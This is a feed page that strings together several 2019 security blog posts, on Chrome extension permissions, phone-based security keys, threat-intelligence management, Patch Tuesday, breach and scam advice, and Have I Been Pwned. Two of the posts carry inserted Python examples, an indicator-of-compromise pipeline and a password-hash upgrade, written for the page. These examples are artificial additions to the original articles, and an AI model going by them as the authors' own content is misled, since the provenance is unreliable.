Find out how to manage identities for everyone in your organization with the Identity Governance Toolkit.

Improving Security and Privacy for Extensions Users

No, Chrome isn’t killing ad blockers -- we’re making them safer

The Chrome Extensions ecosystem has seen incredible advancement, adoption, and growth since its launch over ten years ago. Extensions are a great way for users to customize their experience in Chrome and on the web. As this system grows and expands in both reach and power, user safety and protection remains a core focus of the Chromium project.
In October, we announced a number of changes to improve the security, privacy, and performance of Chrome extensions. These changes include increased user options to control extension permissions, changes to the review process and readability requirements, and requiring two-step verification for developers. In addition, we’ve helped curb abuse through restricting inline installation on websites, preventing the use of deceptive installation practices, and limiting the data collected by extensions. We’ve also made changes to the teams themselves — over the last year, we’ve increased the size of the engineering teams that work on extension abuse by over 300% and the number of reviewers by over 400%.
These and other changes have driven down the rate of malicious installations by 89% since early 2018. Today, we block approximately 1,800 malicious uploads a month, preventing them from ever reaching the store. While the Chrome team is proud of these improvements, the review process alone can't catch all abuse. In order to provide better protection to our users, we need to make changes to the platform as well. This is the suite of changes we’re calling Manifest V3.
This effort is motivated by a desire to keep users safe and to give them more visibility and control over the data they’re sharing with extensions. One way we are doing this is by helping users be deliberate in granting access to sensitive data - such as emails, photos, and access to social media accounts. As we make these changes we want to continue to support extensions in empowering users and enhancing their browsing experience.
To help with this balance, we’re reimagining the way a number of powerful APIs work. Instead of a user granting each extension access to all of their sensitive data, we are creating ways for developers to request access to only the data they need to accomplish the same functionality. One example of this is the introduction of the Declarative Net Request API, which is replacing parts of the Web Request API.
At a high level, this change means that an extension does not need access to all a user’s sensitive data in order to block content. With the current Web Request API, users grant permission for Chrome to pass all information about a network request - which can include things like emails, photos, or other private information - to the extension. In contrast, the Declarative Net Request API allows extensions to block content without requiring the user to grant access to any sensitive information. Additionally, because we are able to cut substantial overhead in the browser, the Declarative Net Request API can have significant, system-level performance benefits over Web Request.


This has been a controversial change since the Web Request API is used by many popular extensions, including ad blockers. We are not preventing the development of ad blockers or stopping users from blocking ads. Instead, we want to help developers, including content blockers, write extensions in a way that protects users’ privacy.
You can read more about the Declarative Net Request API and how it compares to the Web Request API here.
We understand that these changes will require developers to update the way in which their extensions operate. However, we think it is the right choice to enable users to limit the sensitive data they share with third-parties while giving them the ability to curate their own browsing experience. We are continuing to iterate on many aspects of the Manifest V3 design, and are working with the developer community to find solutions that both solve the use cases extensions have today and keep our users safe and in control.

Use your Android phone’s built-in security key to verify sign-in on iOS devices


Compromised credentials are one of the most common causes of security breaches. While Google automatically blocks the majority of unauthorized sign-in attempts, adding 2-Step Verification (2SV) considerably improves account security. At Cloud Next ‘19, we introduced a new 2SV method, enabling more than a billion users worldwide to better protect their accounts with a security key built into their Android phones.
This technology can be used to verify your sign-in to Google and Google Cloud services on Bluetooth-enabled Chrome OS, macOS, and Windows 10 devices. Starting today, you can use your Android phone to verify your sign-in on Apple iPads and iPhones as well.
Security keys
FIDO security keys provide the strongest protection against automated bots, bulk phishing, and targeted attacks by leveraging public key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if you are tricked into providing your username and password. Learn more by watching our presentation from Cloud Next ‘19.


On Chrome OS, macOS, and Windows 10 devices, we leverage the Chrome browser to communicate with your Android phone’s built-in security key over Bluetooth using FIDO’s CTAP2 protocol. On iOS devices, Google’s Smart Lock app is leveraged in place of the browser.


User experience on an iPad with Pixel 3


Until now, there were limited options for using FIDO2 security keys on iOS devices. Now, you can get the strongest 2SV method with the convenience of an Android phone that’s always in your pocket at no additional cost.
It’s easy to get started
Follow these simple steps to protect your Google Account today:
Step 1: Add the security key to your Google Account
  • Add your personal or work Google Account to your Android 7.0+ (Nougat) phone.
  • Make sure you’re enrolled in 2-Step Verification (2SV).
  • On your computer, visit the 2SV settings and click "Add security key".
  • Choose your Android phone from the list of available devices.
Step 2: Use your Android phone's built-in security key
You can find more detailed instructions here. Within enterprise organizations, admins can require the use of security keys for their users in G Suite and Google Cloud Platform (GCP), letting them choose between using a physical security key, an Android phone, or both.
We also recommend that you register a backup hardware security key (from Google or a number of other vendors) for your account and keep it in a safe place, so that you can gain access to your account if you lose your Android phone.

Improving Cyber Resilience with Threat Intelligence

According to the SANS CTI 2019 survey results, 72% of organizations either consume or produce Threat Intelligence. Although most organizations have Intelligence data, they struggle with defining requirements and managing Cyber Threat Intelligence (CTI) as a program with measurable output. This likely results from threat data and intelligence being perceived as a technical function unrelated to business objectives.

We need to change this perception.

In my opinion, the key business objectives most closely related to threat intelligence are Risk Management and Cyber Resilience. Threat Intelligence can influence the outcomes of both.

Cyber Resilience itself requires risk management and adaptability. The need for businesses to become more resilient is driving the demand for an adaptable security architecture—one that not only effectively leverages threat intelligence to improve Security Operations, especially Incident Response, but also adapts cyber defenses such as endpoint and network controls to prevent the latest threats.

Meanwhile, regulations focused on improving cyber security are driving a continuous risk management approach. For example, in 2016, the European Union released the NIS (Network and Information Systems) Directive, which provides a legal framework to boost the overall level of cybersecurity in critical industries and calls specifically for threat intelligence and incident sharing among organizations and national authorities. With these drivers in mind, we now need to design a managed process with the goal of creating an efficient way to increase the business value of CTI. We can define this process as follows:

  • Discovering the most valuable data sources
  • Using automation to collect, investigate, respond and share
  • Integrating CTI into cyber defense processes
  • Measuring to prove the value of Threat Intelligence

1. Collection, Deduplication and Aggregation

The first step in the CTI Management Process is the collection, deduplication and aggregation of the data or feeds. One of the main gaps at the enterprise level is the collection of locally produced Threat Intelligence. Local Threat Intelligence includes data generated from analytics solutions like sandboxes and from incidents. Sandboxes usually produce intelligence data in the form of Indicators of Compromise (IOCs). These local sources could expose targeted attacks, and therefore are potentially the most valuable threat data source.

McAfee’s Open Architecture allows for the production, consumption and sharing of threat intelligence in various ways. Here is an example of how our architecture automates aggregation of various CTI sources with an open-source tool, MISP. The MISP platform subscribes to the McAfee Data Exchange Layer messaging fabric to consume IoCs from McAfee’s Advanced Threat Defense sandbox in real time. Additionally, MISP consumes and manages feeds from open or paid sources, providing an entry-level tool to manage the threat intel process.

Here is another example of how our architecture supports the aggregation process, this time by working with a commercial vendor, ThreatQ.

2. Investigation and Hunting

The second step in the CTI management process is investigation and hunting. Here, the biggest task is figuring out how to make Threat Intelligence actionable, which can be done by answering questions like:

  • Have we seen any related artifacts (IP address connections, Hash/File executions) in my enterprise in the past?
  • Do we have, right now, any devices that have related artifacts?

Before answering these questions, the right data must be collected from the enterprise sensors. Fundamental information should include IP address connections, file hashes on endpoints, web proxy, DNS and Active Directory logs. These logs provide the necessary data for correlation and historical analysis. The following example demonstrates how the architecture can automate some of the key triage steps.

MISP can push Threat Intelligence into McAfee’s SIEM solution, ESM (Enterprise Security Manager), to automate historical analysis. There, it can query McAfee’s Threat Intelligence Exchange server to identify which systems executed related artifacts, and where and when they did so. Furthermore, MISP can run real-time queries against McAfee-protected endpoints with McAfee Active Response to identify any persistent artifacts that are currently in the enterprise network.

Here is another example working with ThreatQ. This time, ThreatQ interacts with McAfee ESM, Active Response and McAfee TIE to identify systems that have or had artifacts related to Threat Intelligence indicators. These various integrations support manual enrichment tasks and investigations.

The screenshot below highlights the various McAfee integrations as part of an investigation.

3. Response

The third step in the CTI Management Process is response. Cyber Threat Intelligence is essential to prevent the latest threats and should be integrated into key cyberdefense countermeasures. The following example demonstrates an automated update process using McAfee’s Open Architecture, with the Data Exchange Layer (DXL) fabric as the key component.

ThreatQ can communicate via the DXL fabric with McAfee technologies. During this process ThreatQ is able to update key cyber defense countermeasure tools with Threat Intelligence to protect against the latest threats.

Another part of this process step is sharing threat intelligence with other parties, such as partners and communities. Most Threat Intelligence Platforms (open source and commercial) support various protocols for external CTI sharing. This includes TLP, STIX, TAXII and DXL. These protocols support the automated exchange and governance of the shared data.

4. Measurement

Finally, the value of Threat Intelligence can be proven by measuring a variety of outcomes. The following are some of the metrics commonly quantified and reported on:

  1. Number of duplicate Threat Intelligence Artifacts removed
  2. Impact on Mean-Time-To-Respond
  3. Number of IOCs generated from Threat Intelligence
  4. Number of incidents identified based on Threat Intelligence
  5. Number of attacks blocked via Threat Intelligence
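Steps 1, 2 and 4 of the process above (collecting and deduplicating indicators from a local sandbox and external feeds, checking them against historical telemetry, and reporting the resulting numbers) as one added Python example. This is illustration code written for this page, not MISP, ThreatQ or McAfee code; every feed, log line and indicator is a constructed placeholder, and the feed and log formats are assumptions.

```python
import csv
import io
import json

# ---- Constructed sample inputs (RFC 5737 / RFC 2606 values, not real IoCs) ----
SAMPLE_SHA256 = "b" * 64  # placeholder hash of a detonated sample
SANDBOX_REPORT = json.dumps({  # local source: one sandbox detonation report
    "sha256": SAMPLE_SHA256,
    "network": {"dns": ["update-check.example.net"], "ipv4": ["203.0.113.10"]},
})
OPEN_FEED_CSV = (  # open feed, CSV with its own column names (assumed format)
    "type,value\n"
    "ip,203.0.113.10\n"
    "domain,update-check.example.net\n"
    "ip,198.51.100.7\n"
)
PAID_FEED_JSON = json.dumps([  # commercial feed, JSON with different type names
    {"indicator": "198.51.100.7", "type": "ipv4"},
    {"indicator": "UPDATE-CHECK.example.net.", "type": "fqdn"},
])

# Feed vocabularies differ; map them onto one set of indicator types.
TYPE_ALIASES = {"ipv4": "ip", "ip": "ip", "fqdn": "domain", "domain": "domain",
                "dns": "domain", "sha256": "sha256"}


def normalise(itype, value):
    """Canonicalise type name and value so the same IoC from two feeds compares equal."""
    itype = TYPE_ALIASES[itype.lower()]
    value = value.strip().lower()
    if itype == "domain":
        value = value.rstrip(".")  # DNS-style feeds append a trailing dot
    return itype, value


def collect_sandbox(report_json):
    report = json.loads(report_json)
    yield "sha256", report["sha256"], "sandbox"
    for itype, values in report["network"].items():
        for value in values:
            yield itype, value, "sandbox"


def collect_csv(text, source):
    for row in csv.DictReader(io.StringIO(text)):
        yield row["type"], row["value"], source


def collect_json_feed(text, source):
    for row in json.loads(text):
        yield row["type"], row["indicator"], source


def aggregate(*generators):
    """Step 1: merge all sources, dedupe on (type, value), keep provenance.
    Returns (indicators dict keyed by (type, value) -> set of sources, raw count)."""
    indicators, raw = {}, 0
    for gen in generators:
        for itype, value, source in gen:
            raw += 1
            indicators.setdefault(normalise(itype, value), set()).add(source)
    return indicators, raw


# Constructed enterprise telemetry: proxy, DNS and endpoint execution events.
LOG_LINES = [
    "2019-06-03T10:14:01Z dns host=ws-017 query=update-check.example.net",
    "2019-06-03T10:14:02Z proxy host=ws-017 dst=203.0.113.10 url=/upd",
    "2019-06-04T08:02:55Z dns host=ws-042 query=cdn.example.com",
    "2019-06-05T16:40:10Z exec host=srv-db1 sha256=" + SAMPLE_SHA256,
    "2019-06-05T16:41:00Z proxy host=srv-db1 dst=192.0.2.44 url=/",
]
FIELD_TYPE = {"dst": "ip", "query": "domain", "sha256": "sha256"}  # log field -> IoC type


def hunt(log_lines, indicators):
    """Step 2: historical check of telemetry against the aggregated indicator set."""
    hits = []
    for line in log_lines:
        ts, sensor, *kvs = line.split()
        fields = dict(kv.split("=", 1) for kv in kvs)
        for fname, itype in FIELD_TYPE.items():
            if fname in fields:
                key = normalise(itype, fields[fname])
                if key in indicators:
                    hits.append({"ts": ts, "host": fields["host"], "sensor": sensor,
                                 "indicator": key, "sources": sorted(indicators[key])})
    return hits


def metrics(raw_count, indicators, hits):
    """Step 4: the kind of numbers the text lists for reporting."""
    return {
        "duplicates_removed": raw_count - len(indicators),
        "iocs_managed": len(indicators),
        "local_iocs": sum(1 for srcs in indicators.values() if "sandbox" in srcs),
        "hits": len(hits),
        "hosts_with_hits": len({h["host"] for h in hits}),
    }


def run_pipeline():
    indicators, raw = aggregate(
        collect_sandbox(SANDBOX_REPORT),
        collect_csv(OPEN_FEED_CSV, "open-feed"),
        collect_json_feed(PAID_FEED_JSON, "paid-feed"),
    )
    hits = hunt(LOG_LINES, indicators)
    return indicators, hits, metrics(raw, indicators, hits)


if __name__ == "__main__":
    _, found, numbers = run_pipeline()
    for hit in found:
        print(hit)
    print(numbers)
```

The hits carry each indicator's provenance, which is what an analyst needs to weigh a sandbox-only indicator (possible targeted activity) differently from one that every open feed already lists.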

Summary

The creation and implementation of the right process is critical to the success of Cyber Threat Intelligence within the enterprise. In this blog, we defined a CTI management process of Collection, Investigation, Response and Measurement. McAfee’s research, management platform and open architecture enable you to implement this process and get the best value out of Cyber Threat Intelligence, promoting resilience and enabling better risk management.

Links to additional resources

The post Improving Cyber Resilience with Threat Intelligence appeared first on McAfee Blogs.

Harnessing Machine Learning and Automation against Advanced Threats

With the specter of advanced cybersecurity threats always on the horizon, enterprises are seriously considering harnessing the power of machine learning and automation to fight against these threats. For good reason too – a cybersecurity survey suggested that organizations with an extensive use of automation rated themselves as much more likely to prevent, detect, respond and contain a cyber attack.

These concepts are becoming increasingly important in today’s era of fast-growing cyber threats, but what do they mean exactly? Machine learning refers to computers learning from data instead of receiving explicit programming. Machine learning algorithms are fed huge datasets and parse through them to recognize patterns or correlations through extended data analysis.

The importance of machine learning

Machine learning is becoming a common feature in more and more industries, and cybersecurity has not lagged behind. An ABI Research report estimated that machine learning in cybersecurity will boost big data, intelligence and analytics spending to $96 billion by 2021. It is quite clear why there is such extended growth – machine learning allows businesses to offer a better response and bolster their own defense when it comes to the big, bad world of cyber threats. Security companies are rejigging the solutions they offer in tune with this trend. They are moving from signature-based systems to layered solutions where machine learning systems interpret data to better detect malware.

Some of these advantages are:

Making Sense of Data – The amount of data that can be collected for cybersecurity is humongous. While the sheer size and amount of data may be too much for humans alone to analyze, this is where machine learning can step in. By analyzing and processing large amounts of data, it may be possible to find patterns or categories of certain behavior which can be used to fight advanced cybersecurity threats.

Using Automation for Better Protection – Different threats can have different attack points for an enterprise and even one threat may attack different touchpoints in different ways. This is where automation can do a much more effective job. By understanding the predicted behavior and touchpoints of a potential attack, automation can create better protection measures across touchpoints suited to exactly the type of predicted attack.

Using A Cluster-based approach for better detection – Quick Heal already uses machine learning to solve various cybersecurity problems using a cluster-based approach, illustrated in this whitepaper. Samples are clustered through machine learning, with each cluster containing samples similar to each other. These generated clusters are huge, and processing them happens through machine learning where they are aggregated, analyzed and automated. The data is then labeled and processed to generate models. After scrutiny of numerous factors, including time, size and quality, they are qualified for endpoint deployment.

Machine Learning and automation will be great weapons in the fight against advanced cybersecurity threats, but they also need to be backed up with a combination of data science and human expertise.


The post Harnessing Machine Learning and Automation against Advanced Threats appeared first on Seqrite Blog.

Microsoft Patch Tuesday, June 2019 Edition

Microsoft on Tuesday released updates to fix 88 security vulnerabilities in its Windows operating systems and related software. The most dangerous of these include four flaws for which there is already exploit code available. There’s also a scary bug affecting all versions of Microsoft Office that can be triggered by a malicious link or attachment. And of course Adobe has its customary monthly security update for Flash Player.

Microsoft says it has so far seen no exploitation against any of the four flaws that were disclosed publicly prior to their patching this week — nor against any of the 88 bugs quashed in this month’s release. All four are privilege escalation flaws: CVE-2019-1064 and CVE-2019-1069 affect Windows 10 and later; CVE-2019-1053 and CVE-2019-0973 both affect all currently supported versions of Windows.

Most of the critical vulnerabilities — those that can be exploited by malware or miscreants to infect systems without any action on the part of the user — are present in Microsoft’s browsers Internet Explorer and Edge.

According to Allan Liska, senior solutions architect at Recorded Future, serious vulnerabilities in this month’s patch batch reside in Microsoft Word (CVE-2019-1034 and CVE-2019-1035).

“This is another memory corruption vulnerability that requires an attacker to send a specially crafted Microsoft Word document for a victim to open, alternatively an attacker could convince a victim to click on a link to a website hosting a malicious Microsoft Word document,” Liska wrote. “This vulnerability affects all versions of Microsoft Word on Windows and Mac as well as Office 365. Given that Microsoft Word Documents are a favorite exploitation tool of cybercriminals, if this vulnerability is reverse engineered it could be widely exploited.”

Microsoft also pushed an update to plug a single critical security hole in Adobe’s Flash Player software, which is waning in use but is still a target for malware purveyors. Google Chrome auto-updates Flash but also now makes users explicitly enable Flash every time they want to use it. By the summer of 2019 Google will make Chrome users go into their settings to enable it every time they want to run it.

Firefox also forces users with the Flash add-on installed to click in order to play Flash content; instructions for disabling or removing Flash from Firefox are here. Adobe will stop supporting Flash at the end of 2020.

Note that Windows 10 likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn’t make it easy for Windows 10 users to change this setting, but it is possible. For all other Windows OS users, if you’d rather be alerted to new updates when they’re available so you can choose when to install them, there’s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type “windows update” into the box that pops up.

Staying up-to-date on Windows patches is good. Updating only after you’ve backed up your important data and files is even better. A good backup means you’re not pulling your hair out if the odd buggy patch causes problems booting the system. So do yourself a favor and back up your files before installing any patches.

As always, if you experience any problems installing any of the patches this month, please feel free to leave a comment about it below; there’s a good chance other readers have experienced the same and may even chime in here with some helpful tips.

Additional reading:

Martin Brinkmann’s take at Ghacks.net

Qualys on Patch Tuesday

SANS’s quick reference by severity

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

We here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Oftentimes, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

1.1M Emuparadise Accounts Exposed in Data Breach

If you’re an avid gamer or know someone who is, you might be familiar with the retro gaming site Emuparadise. This website boasts a large community, a vast collection of gaming music, game-related videos, game guides, magazines, comics, video game translations, and more. Unfortunately, news just broke that Emuparadise recently suffered a data breach in April 2018, exposing the data of about 1.1 million of their forum members.

The operators of the hacked-database search engine DeHashed shared this compromised data with the data breach reference site Have I Been Pwned. According to the site’s owner Troy Hunt, the breach impacted 1,131,229 accounts and involved stolen email addresses, IP addresses, usernames, and passwords stored as salted MD5 hashes. Password salting is the practice of adding unique, random data to each user’s password before it is hashed. However, the MD5 algorithm is no longer considered sufficient for protecting passwords, creating cause for cybersecurity concern.
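What "salted MD5 is no longer sufficient" means for the site operator, as an added Python example (illustration code for this page, not Emuparadise's or Have I Been Pwned's code): a legacy salted-MD5 record is still verified, but on the next successful login it is transparently rehashed with a deliberately slow, iterated function. The `md5$…` and `pbkdf2_sha256$…` record formats and the iteration count are assumptions made for the example.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to your hardware


def legacy_md5_record(password, salt):
    """Build a record in the legacy style: md5$<salt_hex>$<md5(salt + password)>.
    Only kept so existing records can be verified; never create new ones this way."""
    digest = hashlib.md5(salt + password.encode()).hexdigest()
    return f"md5${salt.hex()}${digest}"


def pbkdf2_record(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Build a modern record: pbkdf2_sha256$<iterations>$<salt_hex>$<digest_hex>."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify(password, record):
    """Constant-time comparison against whichever scheme the record uses."""
    scheme, *parts = record.split("$")
    if scheme == "md5":
        salt_hex, digest = parts
        expected = hashlib.md5(bytes.fromhex(salt_hex) + password.encode()).hexdigest()
        return hmac.compare_digest(expected, digest)
    if scheme == "pbkdf2_sha256":
        iterations, salt_hex, digest = parts
        expected = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                       bytes.fromhex(salt_hex), int(iterations), dklen=32)
        return hmac.compare_digest(expected.hex(), digest)
    raise ValueError(f"unknown password scheme: {scheme}")


def login_and_upgrade(password, record):
    """Return (ok, record_to_store). The plaintext is only available at login,
    so that is the moment a legacy MD5 record can be rehashed with PBKDF2."""
    if not verify(password, record):
        return False, record
    if record.startswith("md5$"):
        return True, pbkdf2_record(password)
    return True, record


if __name__ == "__main__":
    old = legacy_md5_record("correct horse", os.urandom(8))
    ok, new = login_and_upgrade("correct horse", old)
    print(ok, new.split("$")[0])  # True pbkdf2_sha256
```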

Emuparadise forced a credential reset after the breach occurred in April 2018. It’s important that users of Emuparadise games take steps to help protect their private information. If you know someone who’s an avid gamer, pass along the following tips to help safeguard their security:

  • Change up your password. If you have an Emuparadise account, you should change up your account password and email password immediately. Make sure the next one you create is strong and unique so it’s more difficult for cybercriminals to crack. Include numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the better!
  • Keep an eye out for sketchy emails and messages. Cybercriminals can leverage stolen information for phishing emails and social engineering scams. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided.
  • Check to see if you’ve been affected. If you or someone you know has made an Emuparadise account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 1.1M Emuparadise Accounts Exposed in Data Breach appeared first on McAfee Blogs.

CCPA is a Shiny Object

The California Consumer Protection Act has gotten a lot of attention recently, and rightly so. It is, however, just one of a number of US state privacy legislation initiatives that have either recently been passed or are under consideration. Consider the Maine Act to Protect the Privacy of Online Consumer Information. This law requires that […]

The post CCPA is a Shiny Object appeared first on Privacy Ref Blog.

Say So Long to Robocalls

For as long as you’ve had a phone, you’ve probably experienced in one form or another a robocall. These days it seems like they are only becoming more prevalent too. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. While these scams vary by country, the most common type features the impersonation of legitimate organizations — like global tech companies, big banks, or the IRS — with the goal of acquiring user data and money. When a robocall hits, users need to be careful to ensure their personal information is protected.

It’s almost impossible not to feel anxious when receiving a robocall. Whether the calls are just annoying, or a cybercriminal uses the call to scam consumers out of cash or information, this scheme is a big headache for all. To combat robocalls, there has been an uptick in apps and government intervention dedicated to fighting this ever-present annoyance. Unfortunately, things don’t seem to be getting better — while some savvy users are successful at avoiding these schemes, there are still plenty of other vulnerable targets.

Falling into a cybercriminal’s robocall trap can happen for a few reasons. First off, many users don’t know that if they answer a robocall, they may trigger more as a result. That’s because, once a user answers, hackers know there is someone on the other end of the phone line and they have an incentive to keep calling. Cybercriminals also have the ability to spoof numbers, mimic voices, and provide “concrete” background information that makes them sound legitimate. Lastly, it might surprise you to learn that robocalls are actually perfectly legal. It starts to become a grey area, however, when calls come through from predatory callers who are operating on a not-so-legal basis.

While government agencies, like the Federal Communications Commission and Federal Trade Commission, do their part to curb robocalls, the fight to stop robocalls is far from over, and more can always be done. Here are some proactive ways you can say so long to pesky scammers calling your phone.

  1. There’s an app for that. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected.
  2. Let unknown calls go to voicemail. Unless you recognize the number, don’t answer your phone.
  3. Never share personal details over the phone. Unfortunately, there’s a chance that cybercriminals may have previously obtained some of your personal information from other sources to bolster their scheme. However, do not provide any further personal or financial information over the phone, like SSNs or credit card information.
  4. Register for the FCC’s “Do Not Call” list. This can help keep you protected from cybercriminals and telemarketers alike by keeping your number off of their lists.
  5. Consider a comprehensive mobile security platform. Utilize the call blocker capability feature from McAfee Mobile Security. This tool can help reduce the number of calls that come through.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Say So Long to Robocalls appeared first on McAfee Blogs.

Security roundup: June 2019

Every month, we dig through cybersecurity trends and advice for our readers. This edition: GDPR+1, the cost of cybercrime revealed, and a ransomware racket.

If you notice this notice…

If year one of GDPR has taught us anything, it’s that we can expect more data breach reports, which means more notifications. Most national supervisory authorities saw an increase in queries and complaints compared to 2017, the European Data Protection Board found.

But are companies following through with breach notifications that are effective, and easy to understand? Possibly not. Researchers from the University of Michigan analysed 161 sample notifications using readability guidelines, and found confusing language that doesn’t clarify whether consumers’ private data is at risk.

The researchers had previously found that people often don’t take action after being informed of a data breach. Their new findings suggest a possible connection with poorly worded notifications. That’s why the report recommends three steps for creating more usable and informative breach notifications.

  • Pay more attention to visual attractiveness (headings, lists and text formatting) and visually highlight key information.
  • Make the notice readable and understandable to everyone by using short sentences, common words (and very little jargon), and by not including unnecessary information.
  • Avoid hedge terms and wording claims like “there is no evidence of misuse”, because consumers could misinterpret this as evidence of absence of risk.

AT&T inadvertently gave an insight into its own communications process after mistakenly publishing a data breach notice recently. Vice Motherboard picked up the story, and pointed out that its actions would have alarmed some users. But it also reckoned AT&T deserves praise for having a placeholder page ready in case of a real breach. Hear, hear. At BH Consulting, we’re big advocates of advance planning for potential incidents.

The cost of cybercrime, updated

Around half of all property crime is now online, when measured by volume and value. That’s the key takeaway from a new academic paper on the cost of cybercrime. A team of nine researchers from Europe and the USA originally published work on this field in 2012 and wanted to evaluate what’s changed. Since then, consumers have moved en masse to smartphones over PCs, but the pattern of cybercrime is much the same.

The body of the report looks at what’s known about the various types of crime and what’s changed since 2012. It covers online card frauds, ransomware and cryptocrime, fake antivirus and tech support scams, business email compromise, telecoms fraud along with other related crimes. Some of these crimes have become more prominent, and there’s also been fallout from cyberweapons like the NotPetya worm. It’s not all bad news: crimes that infringe intellectual property are down since 2012.

Ross Anderson, professor of security engineering at Cambridge University and a contributor to the research, has written a short summary. The full 32-page study is free to download as a PDF here.

Meanwhile, one expert has estimated fraud and cybercrime costs Irish businesses and the State a staggering €3.5bn per year. Dermot Shea, chief of detectives with the NYPD, said the law is often behind criminals. His sentiments match those of the researchers above. They concluded: “The core problem is that many cybercriminals operate with near-complete impunity… we should certainly spend an awful lot more on catching and punishing the perpetrators.” Speaking of which, Europol released an infographic showing how the GozNym criminal network operated, following the arrest of 10 people connected with the gang.

Ransom-go-round

Any ransomware victim will know that their options are limited: restore inaccessible data from backups (assuming they exist), or grudgingly pay the criminals because they need that data badly. The perpetrators often impose time limits to amp up the psychological squeeze, making marks feel like they have no other choice.

Enter third-party companies that claim to recover data on victims’ behalf. A pricey but risk-free option? It turns out, maybe not. If it sounds too good to be true, it probably is. And that’s just what some top-quality sleuthing by ProPublica unearthed. It found two companies that just paid the ransom and pocketed the profit, without telling law enforcement or their customers.

This is important because ransomware is showing no signs of stopping. Fortinet’s latest Q1 2019 global threat report said these types of attacks are becoming targeted. Criminals are customising some variants to go after high-value targets and to gain privileged access to the network. Figures from Microsoft suggest ransomware infection levels in Ireland dropped by 60 per cent. Our own Brian Honan cautioned that last year’s figures might look good just because 2017 was a blockbuster year that featured WannaCry and NotPetya.

Links we liked

Finally, here are some cybersecurity stories, articles, think pieces and research we enjoyed reading over the past month.

If you confuse them, you lose them: a post about clear security communication. MORE

This detailed Wired report suggests Bluetooth’s complexity is making it hard to secure. MORE

Got an idea for a cybersecurity company? ENISA has published expert help for startups. MORE

A cybersecurity apprenticeship aims to provide a talent pipeline for employers. MORE

Remember the Mirai botnet malware for DDoS attacks? There’s a new variant in town. MORE

The hacker and pentester Tinker shares his experience in a revealing interview. MORE

So it turns out most hackers for hire are just scammers. MORE

The cybersecurity landscape and the role of the military. MORE

What are you doing this afternoon? Just deleting my private information from the web. MORE

The post Security roundup: June 2019 appeared first on BH Consulting.

Project Svalbard: The Future of Have I Been Pwned

Back in 2013, I was beginning to get the sense that data breaches were becoming a big thing. The prevalence of them seemed to be really ramping up as was the impact they were having on those of us that found ourselves in them, myself included. Increasingly, I was writing about what I thought was a pretty fascinating segment of the infosec industry; password reuse across Gawker and Twitter resulting in a breach of the former sending Acai berry spam via the latter. Sony Pictures passwords being, well, precisely the kind of terrible passwords we expect people to use but hey, actually seeing them for yourself is still shocking. And while I'm on Sony, the prevalence with which their users applied the same password to their Yahoo! accounts (59% of common email addresses had exactly the same password).

Around this time the Adobe data breach happened and that got me really interested in this segment of the industry, not least because I was in there. Twice. Most significantly though, it contained 153M other people which was a massive incident, even by today’s standards. All of these things combined – the prevalence of breaches, the analysis I was doing and the scale of Adobe – got me thinking: I wonder how many people know? Do they realise they were breached? Do they realise how many times they were breached? And perhaps most importantly, have they changed their password (yes, almost always singular) across the other services they use? And so Have I Been Pwned was born.

